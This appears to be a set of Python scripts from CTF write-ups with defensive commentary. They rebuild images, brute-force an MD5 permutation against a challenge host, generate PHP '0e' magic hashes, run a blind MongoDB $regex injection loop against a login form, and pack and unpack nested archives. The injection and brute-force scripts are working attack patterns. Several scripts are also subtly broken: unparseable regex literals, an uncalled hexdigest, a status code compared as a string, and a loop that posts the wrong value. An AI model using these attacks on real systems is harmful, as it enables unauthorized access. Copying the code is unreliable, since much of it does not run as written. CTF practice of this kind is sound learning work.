1.利用像素点还原图片。
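from PIL import Image
import re


def rebuild_image(pixel_file, width, height):
    """Rebuild an RGB image from a text file holding one "r,g,b" pixel per line.

    Lines are consumed in column-major order (every row of column 0, then
    column 1, ...), which is the order the original nested loop used.  The
    write-up picked 887 x 111 by factoring the number of lines in the file.

    Args:
        pixel_file: path of the text file; each line carries at least three
            comma-separated integers, any extra fields are ignored.
        width, height: image size; exactly width * height lines are read.

    Returns:
        A PIL.Image in mode "RGB".

    Raises:
        ValueError: the file ends before width * height lines were read, or a
            field is not an integer.
        IndexError: a line has fewer than three comma-separated fields.
    """
    img = Image.new("RGB", (width, height))
    with open(pixel_file) as lines:  # closed even when a line fails to parse
        for col in range(width):
            for row in range(height):
                line = next(lines, None)
                if line is None:
                    raise ValueError(
                        "%s: expected %d pixel lines, ran out after %d"
                        % (pixel_file, width * height, col * height + row)
                    )
                parts = line.split(",")
                img.putpixel((col, row), (int(parts[0]), int(parts[1]), int(parts[2])))
    return img


if __name__ == '__main__':
    image = rebuild_image('ce.txt', 887, 111)  # ce.txt holds the pixel values
    image.show()
    image.save("c.png")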
2.py requests方法的利用以及利用正则匹配查找文本暴力破解md5值。
#coding : utf8
import requests
import re
import hashlib
import itertools

# CTF write-up: fetch the challenge page, pull a target MD5 digest and a
# character pool out of its HTML, then look for the 9-character permutation
# of the pool whose MD5 equals the target.  Defender's view: a secret that is
# a permutation of 9 known characters under unsalted MD5 has only 9! = 362880
# candidates and is exhausted in well under a second, so a check like this is
# at best a proof-of-work puzzle, never an authentication control.
# NOTE(review): host, port, the `pass` value and the PHPSESSID below are
# specific to that exercise.
s = requests.session()  # one session so cookies persist across the two requests
url = "http://106.75.67.214:2050/?pass=bee7a613a8fa4f2f"
data = {'PHPSESSID':'6h7b4caq8bo41i3m5fg2983cq5'}
content = s.get(url=url,data=data)
# NOTE(review): the two pattern literals below do not parse as written - the
# quoting looks mangled by copy/paste.  The apparent intent is to take the
# text following `sh">` up to the next `<` as the target digest and the text
# following `code">` as the character pool; confirm against the original.
target = re.findall("sh">(.*)<",content.text)
target = target[0]
poc = re.findall("code">(.*)<",content.text)
str1 = poc[0]
# Every ordering of 9 distinct characters drawn from the pool, joined back
# into strings.  Materialised as one list, so memory grows with pool size.
a = [''.join(x) for x in itertools.permutations(str1, 9)]
for i in range(0,len(a)):
    final = hashlib.md5(a[i])
    if final.hexdigest() == target:
        # Submit the matching candidate; the loop keeps running afterwards.
        flag = s.get(url="http://106.75.67.214:2050/?code="+a[i])
        print flag.content
        print flag.headers
3.利用py将base64编码的字符串还原成图片
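import os
import base64

# The base64 text to turn back into an image.  "sdasdas==" is the placeholder
# from the write-up; paste the real blob between the quotes.
strs='''''sdasdas=='''


def save_base64_image(text, path):
    """Decode *text* (base64) and write the resulting bytes to *path*.

    Characters outside the base64 alphabet (line breaks, stray quotes from a
    paste) are skipped, which is base64.b64decode's default; bad padding
    raises binascii.Error.  The file is opened in binary mode and closed even
    if the write fails, which the original open/write/close sequence did not
    guarantee.

    Args:
        text: base64-encoded str or bytes.
        path: destination file name.

    Returns:
        The decoded bytes that were written.
    """
    data = base64.b64decode(text)
    with open(path, 'wb') as out:
        out.write(data)
    return data


if __name__ == '__main__':
    save_base64_image(strs, '1.jpg')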
4.生成0e哈希值:
#coding:utf-8
import hashlib
import itertools

def go():
    """Search for an input whose salted MD5 hex digest looks like 0e<digits only>.

    Digests of that shape are the "magic hash" case of PHP's loose ``==``
    comparison, where a string such as "0e12345" is read as the number 0 and
    therefore equals any other "0e<digits>" string.  A server that compares
    a user-supplied hash with a stored one using ``==`` instead of ``===`` /
    ``hash_equals()`` is the condition this exercise targets; strict
    comparison closes it.  The salt "SALT" is a stand-in for the one the
    exercise used.
    """
    payload = [c for c in "qwertyuioplkjhgfdsazxcvbnm123654789"]  # 35-character alphabet
    i = 0
    print payload
    # repeat= fixes the candidate length; at 35**30 candidates this loop has
    # no natural end, so the counter/break below was the way to stop it.
    for j in itertools.product(payload,repeat=30):
        payloads = "".join(j)
        #print pow
        #i = i+ 1
        #if i == 10:
        #    break
        str1 = hashlib.md5(payloads).hexdigest + "SALT"
        str2 = hashlib.md5(str1)
        # Wanted shape: leading "0e" followed by decimal digits only.
        if (str2[0]=="0") & (str2[1]=="e") & (str2[2:].isdigit()):
            print payloads
go()
5.mongodb基于正则注入:
#coding:utf-8
import requests
import string
# print string.ascii_letters
# print string.digits

# Write-up of a blind NoSQL-injection exercise: the login form's ``passwd``
# parameter reaches a MongoDB query without type checking, so sending it as
# ``passwd[$regex]`` turns the equality check into a regular-expression match
# and the redirect-or-not response reveals whether the guessed prefix is
# right.  Defender's view: reject non-string values and ``$``-prefixed keys
# in request parameters before they reach the query (or validate the input
# against a schema), and never keep a comparable plaintext secret - with a
# properly hashed password there is nothing for a regex to match.
# Detection: a burst of requests from one client whose ``passwd[$regex]``
# value grows by one character each time.
flag = "c1ctf{"  # known prefix of the value being recovered
payload = string.ascii_letters + string.digits  # candidate alphabet for the next character

# NOTE(review): the host is a placeholder in the original write-up.
url = "http://xx.x.x.x/index.php?"
restsrt = True
while restsrt:  # keep going as long as the previous pass extended the prefix
    restsrt = False
    for i in payload:
        payloads = flag + i
        post_data = {"username":"admin","passwd[$regex]":flag+".*"}
        #post_data = {"username":"admin","passwd[$regex]":"^"+flag}
        # Redirects are not followed so the raw status code stays visible.
        r = requests.get(url = url,data = post_data,allow_redirects = False)
        if r.status_code == "302":
            print payloads
            flag = flag + i
            restsrt =True
            if i == "}":  # closing brace ends the flag format
                exit(0)
            break
6.多次压缩打包
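#coding:utf-8
import tarfile


def build_nested_archives(layers=299, seed_file="flag.py", wrapper_file="1.php"):
    """Write shell0.tar.gz .. shell<layers>.tar.gz, each wrapping the previous one.

    shell0.tar.gz holds only *seed_file*; every shell<i>.tar.gz for i >= 1
    holds *wrapper_file* plus shell<i-1>.tar.gz.  Archives are written to
    the current directory, as in the original script.  Each archive is
    opened with ``with`` so the gzip stream is flushed and closed even if
    an ``add`` fails part-way.

    Deeply nested archives like this are also what archive scanners have to
    cope with: an unpacker that only looks a fixed number of levels deep
    never sees the innermost member, so extraction tools should cap and
    report nesting depth rather than recurse blindly.

    Args:
        layers: number of wrapping archives to create (shell1 .. shell<layers>);
            the default reproduces the original 299.
        seed_file: file stored in the innermost archive.
        wrapper_file: file added alongside the previous archive at every layer.

    Returns:
        The name of the outermost archive written.

    Raises:
        OSError: a file to add does not exist or an archive cannot be written.
    """
    name = "shell0.tar.gz"
    with tarfile.open(name, "w:gz") as innermost:
        innermost.add(seed_file)
    for depth in range(1, layers + 1):
        previous = name
        name = "shell%d.tar.gz" % depth
        with tarfile.open(name, "w:gz") as archive:
            archive.add(wrapper_file)
            archive.add(previous)
    return name


if __name__ == "__main__":
    build_nested_archives()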
7.多次解压:
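#coding:utf-8
import os
import tarfile


def _check_members(archive, dest):
    """Raise ValueError if any member of *archive* would land outside *dest*.

    Guards extractall() against "tar slip": member names such as ../x or
    /etc/x, and symlinks/hardlinks whose target points outside the
    destination.  Only used on Pythons without tarfile's built-in filters.
    """
    base = os.path.realpath(dest)

    def inside(path):
        return path == base or path.startswith(base + os.sep)

    for member in archive.getmembers():
        target = os.path.realpath(os.path.join(base, member.name))
        if not inside(target):
            raise ValueError("archive member escapes destination: %r" % member.name)
        if member.issym() or member.islnk():
            # symlink targets are relative to the link's directory, hardlink
            # targets are relative to the archive root
            anchor = os.path.dirname(target) if member.issym() else base
            link = os.path.realpath(os.path.join(anchor, member.linkname))
            if not inside(link):
                raise ValueError("archive link escapes destination: %r" % member.name)


def _extract_safely(archive, dest):
    """Extract *archive* into *dest*, refusing members that escape it."""
    if hasattr(tarfile, "data_filter"):
        # Python 3.12+ (and the backports): the stdlib filter rejects
        # absolute paths, traversal and links pointing outside dest.
        archive.extractall(dest, filter="data")
    else:
        _check_members(archive, dest)
        archive.extractall(dest)


def extract_nested_archives(layers=299, dest="."):
    """Unpack shell<layers>.tar.gz down to shell1.tar.gz, outermost first.

    Each shell<i>.tar.gz is expected to contain shell<i-1>.tar.gz, so
    extracting from the highest index downwards makes the next archive
    available for the following iteration.  shell0.tar.gz is opened by no
    iteration, matching the original loop over range(1, 300) reversed.

    The original script built the names as "shell<i>tar.gz" (missing the
    dot), so it could not open the archives the packing script wrote; the
    names now match "shell<i>.tar.gz".  Members are also checked so that an
    archive crafted with "../" names or outward-pointing links cannot write
    outside *dest*.

    Args:
        layers: index of the outermost archive; archives layers .. 1 are
            extracted in that order.  The default reproduces the original 299.
        dest: directory holding the archives and receiving the extracted
            files; defaults to the current directory like the original.

    Raises:
        OSError: an expected shell<i>.tar.gz is missing or unreadable.
        ValueError, tarfile.TarError: an archive contains a member that would
            be written outside *dest*.
    """
    for index in range(layers, 0, -1):
        name = os.path.join(dest, "shell%d.tar.gz" % index)
        with tarfile.open(name) as archive:  # closed even if extraction fails
            _extract_safely(archive, dest)


if __name__ == "__main__":
    extract_nested_archives()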